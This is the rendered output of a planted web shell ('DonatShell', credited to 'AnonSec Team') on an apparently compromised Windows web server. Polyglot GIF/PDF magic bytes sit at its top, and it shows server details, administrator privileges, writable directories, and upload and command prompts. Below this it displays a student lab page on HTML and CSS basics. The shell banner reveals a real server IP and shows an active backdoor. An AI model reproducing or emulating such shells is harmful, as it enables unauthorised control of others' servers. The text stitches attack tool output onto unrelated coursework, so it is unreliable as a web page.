GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/Classes/CST1021/Labs/Lab07/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/Classes/CST1021/Labs/Lab07/Lab07.html
<!DOCTYPE html>

<html lang="en">

<head>
	<meta charset="utf-8">
	<title>Lab 7 - Jim Martinson</title>
	<link href="Lab07.css" rel="stylesheet" type="text/css">
</head>

<body>

<h1>Lab 7- Jim Martinson</h1>

<header>
	<h2>HTML and CSS</h2>
	HTML (the H>ypert>ext M>arkup L>anguage) and CSS (C>ascading S>tyle S>heets) are two of the core technologies for building Web pages.
	HTML provides the structure of the page, CSS the (visual and aural) layout, for a variety of devices.
	Along with graphics and scripting, HTML and CSS are the basis of building Web pages and Web Applications.
</header>

<article>
	<h3>HTML</h3>
	HTML is a markup language for describing web documents (web pages).
	HTML tags normally come in pairs like &lt;p&gt; and &lt;/p&gt;.
	The first tag in a pair is the start tag, the second tag is the end tag.
	The end tag is written like the start tag, but with a slash before the tag name.
	The start tag is often called the opening tag. The end tag is often called the closing tag.
	HTML elements with no content are called empty or void elements.
	&lt;br&gt; is an empty or void element without a closing tag (the &lt;br&gt; tag defines a line break).
	Empty or void elements have no closing tag.
</article>
<aside>
	HTML stands for H>ypert>ext M>arkup L>anguage.
	A markup language is a set of markup tags.
	HTML documents are described by HTML tags.
	Each HTML tag describes different document content.
	<br>
	HTML was based on the Standard Generalized Markup Language (SGML) document format at the European Council for Nuclear Research, known as CERN. The CERN acronym is derived from the French name Conseil Européen pour la Recherche Nucléaire.
</aside>

<article>
	<h3>CSS</h3>
	Styles Solved a Big Problem.
	HTML was never intended to contain tags for formatting a document.
	HTML was intended to define the content of a document, like:<br>
	&nbsp; &nbsp; &lt;h1&gt;This is a heading&lt;/h1&gt;<br>
	&nbsp; &nbsp; &lt;p&gt;This is a paragraph.&lt;/p&gt;<br>
	When tags like &lt;font&gt;, and color attributes were added to the HTML 3.2 specification, it started a nightmare for web developers. Development of large web sites, where fonts and color information were added to every single page, became a long and expensive process.
	To solve this problem, the World Wide Web Consortium (W3C) created CSS.
	In HTML 4.0, all formatting could be removed from the HTML document, and stored in a separate CSS file.
	All browsers support CSS today.
</article>
<aside>
	CSS stands for C>ascading S>tyle S>heets.
	Styles define how to display HTML elements.
	Styles were added to HTML 4.0 to solve a problem.
	External Style Sheets can save a lot of work.
	External Style Sheets are stored in CSS files.
</aside>

<!-- </main> -->

<footer>
Learn more at: http://www.w3.org/standards/webdesign/htmlcss.
</footer>

</body>

</html>

Anon7 - 2022
AnonSec Team